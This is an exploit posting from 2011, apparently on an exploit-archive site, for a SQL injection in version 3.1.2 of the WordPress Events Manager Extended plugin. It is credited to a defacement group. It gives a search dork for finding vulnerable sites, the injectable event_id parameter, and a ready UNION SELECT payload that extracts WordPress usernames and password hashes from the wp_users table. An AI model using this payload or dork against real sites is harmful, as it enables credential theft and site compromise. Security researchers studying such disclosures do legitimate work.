Wordpress Events Manager Extended Plugin SQL Injection Vulnerability

2011-06-11 13:15:10

------------------------------------------------------------------------
# Wordpress Events Manager Extended Plugin Persistent SQL Vulnerability
------------------------------------------------------------------------

# SoftwareLink: http://wordpress.org/extend/plugins/events-manager-extended/
# Version : 3.1.2
# Author : LoocK3D
# Date : 11 June , 2011
------------------------------------------------------------------------

[-] Dork ; inurl:wp-admin/admin.php?page=
[-] Vulnerable File ; /wp-admin/admin.php?page=people&action=printable&event_id=[SQL]
[-] Exploit ; -1+union+select+0,1,2,concat_ws(user_login,0x3a,user_pass)UAHCrew,4+from+wp_users--



------------------------------------------------------------------------

# UAHCrew Member : Hackeri-AL - LoocK3D - b4cKd00r ~
# Deface Archive : http://zone-h.org/archive/notifier=UAH-Crew
# UAHCrew : [email protected]
# LoocK3D : [email protected]

------------------------------------------------------------------------

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.